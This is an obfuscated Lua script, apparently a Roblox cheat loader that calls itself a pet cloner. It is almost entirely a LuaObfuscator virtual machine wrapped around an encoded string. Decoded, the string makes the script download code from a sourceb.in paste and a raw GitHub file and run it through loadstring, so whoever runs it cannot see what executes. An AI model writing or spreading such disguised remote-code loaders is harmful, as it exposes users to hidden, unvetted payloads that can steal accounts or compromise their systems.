--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v98=v5(v82,v19);v19=nil;return v98;else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/(((882 -(282 + 595)) -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-1)) + (2 -1))) ;return v83-(v83%((2257 -(1523 + 114)) -(555 + 11 + 53))) ;else local v84=(933 -(857 + 74))^(v32-(569 -((523 -156) + (1266 -(68 + 997))))) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + 2 ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + 4 + 0 ;return (v40 * (3720433 + 13056783)) + (v39 * (66493 -(892 + 65))) + (v38 * 256) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(0 -(0 + 0))) then v42=v23();v43=v23();v41=1 -0 ;end if (v41==((125 + 228) -(87 + 263))) then if (v46==((1065 -(261 + 624)) -((118 -51) + 113))) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else v46=1 + 0 ;v44=18 -(10 + 8) ;end elseif (v46==(8135 -6088)) then return ((v45==(952 -(802 + 150))) and (v47 * (((1083 -(1020 + 60)) -2)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1809 -786) ) * (v44 + (v45/((440 -(145 + 293))^((1516 -(630 + 793)) -41)))) ;end if (v41==2) then v46=v20(v43,16 + 5 ,1028 -(915 + 82) );v47=((v20(v43,27 + 5 )==(773 -(201 + 571))) and  -(2 -1)) or (1 + 0) ;v41=2 + (3 -2) ;end if (v41==(3 -2)) then v44=(4 -3) -0 ;v45=(v20(v43,(468 + 720) -(1069 + 118) ,20) * ((4 -2)^32)) + v42 ;v41=4 -2 ;end end end local function v25(v48) local v49=(1413 -(447 + 966)) -0 ;local v50;local v51;while true do if (v49==(1750 -((2080 -1320) + 987))) then return v6(v51);end if (v49==(1915 -(1789 + 124))) then v51={};for v87=1, #v50 do v51[v87]=v2(v1(v3(v50,v87,v87)));end v49=769 -(745 + 21) ;end if (v49==(0 + 0)) then v50=nil;if  not v48 then local v93=0 -0 ;while true do if (v93==(0 -0)) then v48=v23();if (v48==0) then return "";end break;end end end v49=1 + 0 ;end if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(1056 -(79 + 8 + 968)) );v18=v18 + v48 ;v49=8 -(13 -7) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 403 -(320 + 83) ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 1878 -(332 + 1546) ;end)();while true do if (v66==(1384 -(746 + 638))) then if ((0 + 0)==v52) then v53=(function() return function(v102,v103,v104) local v105=(function() return 0;end)();local v106=(function() return;end)();while true do if ((0 -0)~=v105) then else v106=(function() return 0;end)();while true do if (v106==0) then local v145=(function() return 341 -(218 + 123) ;end)();while true do if (v145==(1581 -(1535 + 46))) then v102[v103-#"/" ]=(function() return v104();end)();return v102,v103,v104;end end end end break;end end end;end)();v54=(function() return {};end)();v55=(function() return {};end)();v52=(function() return 1;end)();end if (v52==(2 + 0)) then local v96=(function() return 0;end)();while true do if (v96==(0 + 0)) then v59=(function() return {};end)();for v113= #" ",v58 do local v114=(function() return 560 -(306 + 254) ;end)();local v115=(function() return;end)();local v116=(function() return;end)();local v117=(function() return;end)();while true do if (v114==(0 + 0)) then local v129=(function() return 0 -0 ;end)();while true do if (v129==(1467 -(899 + 568))) then v115=(function() return 0;end)();v116=(function() return nil;end)();v129=(function() return 1 + 0 ;end)();end if ((2 -1)==v129) then v114=(function() return 1;end)();break;end end end if (v114~=1) then else v117=(function() return nil;end)();while true do if (v115==(604 -(268 + 335))) then if (v116== #">") then v117=(function() return v21()~=0 ;end)();elseif (v116==(292 -(60 + 230))) then v117=(function() return v24();end)();elseif (v116== #"91(") then v117=(function() return v25();end)();end v59[v113]=(function() return v117;end)();break;end if (v115~=0) then else local v185=(function() return 572 -(426 + 146) ;end)();local v186=(function() return;end)();while true do if (0~=v185) then else v186=(function() return 0;end)();while true do if (v186==(1 + 0)) then v115=(function() return 1457 -(282 + 1174) ;end)();break;end if ((811 -(569 + 242))~=v186) then else v116=(function() return v21();end)();v117=(function() return nil;end)();v186=(function() return 2 -1 ;end)();end end break;end end end end break;end end end v96=(function() return 1;end)();end if (v96~=1) then else v57[ #"91("]=(function() return v21();end)();v52=(function() return 1 + 2 ;end)();break;end end end v66=(function() return 1;end)();end if (v66==1) then if (v52==(1027 -(706 + 318))) then for v99= #"{",v23() do local v100=(function() return v21();end)();if (v20(v100, #"/", #"}")~=(1251 -(721 + 530))) then else local v108=(function() return 1271 -(945 + 326) ;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v108==2) then while true do if (v109~= #">") then else local v176=(function() return 0 -0 ;end)();local v177=(function() return;end)();while true do if (v176~=(0 + 0)) then else v177=(function() return 0;end)();while true do if (1==v177) then v109=(function() return 702 -(271 + 429) ;end)();break;end if (v177~=(0 + 0)) then else v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==0) then local v195=(function() return 0;end)();local v196=(function() return;end)();while true do if (v195==0) then v196=(function() return 0;end)();while true do if (0~=v196) then else v112[ #"91("]=(function() return v22();end)();v112[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v110== #".") then v112[ #"xxx"]=(function() return v23();end)();elseif (v110==2) then v112[ #"xnx"]=(function() return v23() -((1502 -(1408 + 92))^(1102 -(461 + 625))) ;end)();elseif (v110== #"gha") then local v201=(function() return 0;end)();local v202=(function() return;end)();while true do if (v201~=0) then else v202=(function() return 1288 -(993 + 295) ;end)();while true do if (v202~=(0 + 0)) then else v112[ #"nil"]=(function() return v23() -((1173 -(418 + 753))^(7 + 9)) ;end)();v112[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v177=(function() return 1 + 0 ;end)();end end break;end end end if ((0 + 0)~=v109) then else local v178=(function() return 0 + 0 ;end)();local v179=(function() return;end)();while true do if ((529 -(406 + 123))==v178) then v179=(function() return 1769 -(1749 + 20) ;end)();while true do if (1~=v179) then else v109=(function() return  #"!";end)();break;end if (v179==0) then v110=(function() return v20(v100,2, #"nil");end)();v111=(function() return v20(v100, #".com",6);end)();v179=(function() return 1;end)();end end break;end end end if (v109==(1 + 1)) then local v180=(function() return 0;end)();while true do if (v180==0) then if (v20(v111, #"/", #"\\")== #".") then v112[2]=(function() return v59[v112[1324 -(1249 + 73) ]];end)();end if (v20(v111,1 + 1 ,2)~= #"]") then else v112[ #"-19"]=(function() return v59[v112[ #"gha"]];end)();end v180=(function() return 1;end)();end if (v180==1) then v109=(function() return  #"91(";end)();break;end end end if (v109== #"xnx") then if (v20(v111, #"gha", #"gha")~= #">") then else v112[ #"0313"]=(function() return v59[v112[ #"?id="]];end)();end v54[v99]=(function() return v112;end)();break;end end break;end if (v108==(1145 -(466 + 679))) then local v127=(function() return 0 -0 ;end)();while true do if (v127~=0) then else v109=(function() return 0 -0 ;end)();v110=(function() return nil;end)();v127=(function() return 1;end)();end if (v127==1) then v108=(function() return 1901 -(106 + 1794) ;end)();break;end end end if (v108==(1 + 0)) then local v128=(function() return 0 + 0 ;end)();while true do if (v128==0) then v111=(function() return nil;end)();v112=(function() return nil;end)();v128=(function() return 2 -1 ;end)();end if (v128~=(2 -1)) then else v108=(function() return 116 -(4 + 110) ;end)();break;end end end end end end for v101= #".",v23() do v55,v101,v28=(function() return v53(v55,v101,v28);end)();end return v57;end if (v52==(585 -(57 + 527))) then local v97=(function() return 0;end)();while true do if (v97==(1428 -(41 + 1386))) then v58=(function() return v23();end)();v52=(function() return 2;end)();break;end if (v97~=(103 -(17 + 86))) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v97=(function() return 1 + 0 ;end)();end end end break;end end end end local function v29(v60,v61,v62) local v63=v60[1 -(0 -0) ];local v64=v60[5 -3 ];local v65=v60[(473 -(244 + 60)) -(122 + 44) ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=1 + 0 ;local v72= -(1 -0);local v73={};local v74={...};local v75=v12("#",...) -(1 + 0) ;local v76={};local v77={};for v85=0 + (476 -(41 + 435)) ,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + (1002 -(938 + 63)) ];else v77[v85]=v74[v85 + (1 -0) ];end end local v78=(v75-v69) + (66 -(30 + 35)) ;local v79;local v80;while true do local v86=0 + 0 + 0 ;while true do if (v86==(1257 -((2168 -(936 + 189)) + 214))) then v79=v67[v71];v80=v79[1];v86=3 -2 ;end if ((123<=2579) and (v86==((400 + 813) -(323 + 889)))) then if (v80<=4) then if (v80<=(2 -(1614 -(1565 + 48)))) then if (v80==(580 -(361 + 219))) then local v118=320 -(53 + 267) ;local v119;local v120;local v121;local v122;local v123;while true do if (v118==7) then v77[v123]=v122[v79[1 + 2 + 1 ]];break;end if (v118==(413 -(15 + 398))) then v119=nil;v120,v121=nil;v122=nil;v123=nil;v77[v79[984 -(18 + (2102 -(782 + 356))) ]]=v62[v79[(278 -(176 + 91)) -8 ]];v71=v71 + 1 + 0 ;v118=1 + 0 ;end if ((v118==(854 -((52 -32) + 830))) or (846>=2368)) then v71=v71 + 1 + 0 ;v79=v67[v71];v123=v79[128 -(116 + 10) ];v77[v123]=v77[v123](v13(v77,v123 + (1 -0) + 0 ,v72));v71=v71 + (739 -(542 + 196)) ;v79=v67[v71];v118=10 -5 ;end if ((v118==(1 + 0)) or (4012<=3358)) then v79=v67[v71];v123=v79[2 + 0 ];v122=v77[v79[3]];v77[v123 + (1093 -(975 + 117)) + 0 ]=v122;v77[v123]=v122[v79[10 -6 ]];v71=v71 + (1876 -(157 + 1718)) ;v118=4 -2 ;end if (v118==5) then v77[v79[2]]();v71=v71 + (1552 -(1126 + 425)) ;v79=v67[v71];v77[v79[2]]=v62[v79[3]];v71=v71 + ((330 + 76) -(118 + 287)) ;v79=v67[v71];v118=23 -17 ;end if (v118==3) then v79=v67[v71];v123=v79[1123 -(118 + 1003) ];v120,v121=v70(v77[v123](v13(v77,v123 + (2 -1) ,v79[380 -(142 + 235) ])));v72=(v121 + v123) -(4 -3) ;v119=0 + 0 ;for v182=v123,v72 do local v183=977 -(553 + 424) ;while true do if ((1494<=3005) and (v183==(0 -0))) then v119=v119 + 1 ;v77[v182]=v120[v119];break;end end end v118=4 + 0 ;end if ((v118==((21 -15) + 0)) or (3111==2134)) then v77[v79[2 + 0 ]]=v62[v79[2 + 1 ]];v71=v71 + 1 + 0 ;v79=v67[v71];v123=v79[4 -(6 -4) ];v122=v77[v79[3]];v77[v123 + (2 -1) ]=v122;v118=15 -8 ;end if (v118==(1 + 1)) then v79=v67[v71];v77[v79[9 -7 ]]=v79[3];v71=v71 + (754 -(239 + 514)) ;v79=v67[v71];v77[v79[1 + 1 ]]=v79[1332 -(797 + 532) ]~=(0 + 0) ;v71=v71 + (1019 -(697 + 321)) + 0 ;v118=6 -3 ;end end else v77[v79[1204 -(373 + 829) ]]=v79[734 -((1296 -820) + 255) ];end elseif (v80<=(1132 -(369 + 761))) then v71=v79[2 + 1 ];elseif ((2355==2355) and (v80>(5 -2))) then local v130=v79[3 -1 ];v77[v130]=v77[v130](v13(v77,v130 + (239 -(64 + 174)) ,v72));else v77[v79[1 + (1 -0) ]]=v62[v79[(6 -3) -0 ]];end elseif ((v80<=(343 -(144 + 75 + 117))) or (588<=432)) then if (v80<=5) then if ((4797>=3895) and (v77[v79[218 -(42 + 174) ]]==v79[4])) then v71=v71 + (1 -0) + 0 ;else v71=v79[3 + 0 ];end elseif ((3577==3577) and (v80>6)) then local v135=v79[1 + 1 ];local v136,v137=v70(v77[v135](v13(v77,v135 + (1505 -(363 + 1141)) ,v79[3])));v72=(v137 + v135) -(1581 -(1183 + 397)) ;local v138=0 -0 ;for v174=v135,v72 do local v175=0 + 0 ;while true do if (v175==(0 + 0)) then v138=v138 + (1976 -(1913 + 62)) ;v77[v174]=v136[v138];break;end end end else local v139=v79[2 + 0 ];local v140=v77[v79[(18 -11) -(1231 -(322 + 905)) ]];v77[v139 + 1 ]=v140;v77[v139]=v140[v79[1937 -(565 + 1368) ]];end elseif (v80<=(30 -22)) then v77[v79[2]]();elseif ((3794>3693) and (v80>(1670 -((2088 -(602 + 9)) + 184)))) then do return;end else v77[v79[2 -0 ]]=v79[3 + 0 ]~=(856 -((1753 -(449 + 740)) + 292)) ;end v71=v71 + (1 -0) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F63646E2E736F75726365622E696E2F62696E732F5751365A324F702Q33312F3003543Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4E656D657369732D6C61672F506574436C6F6E657256322F726566732F68656164732F6D61696E2F42656E47726F7748756200153Q0012013Q00013Q0026053Q0001000100010004023Q00010001001203000100023Q00122Q000200033Q00202Q00020002000400122Q000400056Q000500016Q000200056Q00013Q00024Q00010001000100122Q000100023Q00122Q000200033Q00202Q000200020004001201000400064Q0007000200044Q000400013Q00022Q00080001000100010004023Q001400010004023Q000100012Q000A3Q00017Q00",v9(),...);
